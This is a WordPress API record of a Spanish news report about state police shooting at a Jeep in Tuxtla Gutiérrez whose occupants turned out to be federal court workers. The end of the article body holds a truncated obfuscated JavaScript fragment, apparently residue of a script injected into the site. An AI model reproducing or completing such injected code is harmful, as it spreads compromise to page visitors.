{"id":18577,"date":"2024-10-26T05:54:28","date_gmt":"2024-10-26T05:54:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18577"},"modified":"2024-10-26T05:54:28","modified_gmt":"2024-10-26T05:54:28","slug":"ministeriales-balean-camioneta-en-las-torres-2","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18577","title":{"rendered":"Ministeriales balean camioneta en Las Torres"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729921964369-576x1024.jpg\" alt=\"\" class=\"wp-image-18578\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729921964369-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729921964369-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/FB_IMG_1729921964369.jpg 720w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 25 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la ma\u00f1ana, se registr\u00f3 una intensa movilizaci\u00f3n polic\u00edaca en la zona Oriente de Tuxtla Guti\u00e9rrez por la presencia de una unidad con actitud evasiva.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando elementos de la Fiscal\u00eda General del Estado a bordo de una camioneta realizaban labores en la Colonia Las Torres.<\/p>\n\n\n\n<p>En el lugar se inform\u00f3 que, los elementos le marcaron el alto al conductor de la camioneta Jeep de Color negro pero hizo caso omiso.<\/p>\n\n\n\n<p>Esto ocasion\u00f3 que los ministeriales dispararon en contra de la unidad.<\/p>\n\n\n\n<p>La camioneta circul\u00f3 hasta quedar frente a las instalaciones de la SSyTM.<\/p>\n\n\n\n<p>En este lugar los ocupantes de la camioneta se identificaron como trabajadores del Poder Judicial de la Federaci\u00f3n.<\/p>\n\n\n\n<p>No hubo lesionados e indicaron que, interpondr\u00edan la denuncia correspondiente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 25 de octubre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este viernes por la ma\u00f1ana, se registr\u00f3 una intensa movilizaci\u00f3n polic\u00edaca en la zona Oriente de Tuxtla Guti\u00e9rrez por la presencia de una unidad con actitud evasiva. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando elementos de la Fiscal\u00eda General del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18578,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-18577","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18577","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18577"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18577\/revisions"}],"predecessor-version":[{"id":18579,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18577\/revisions\/18579"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18578"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18577"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18577"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18577"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}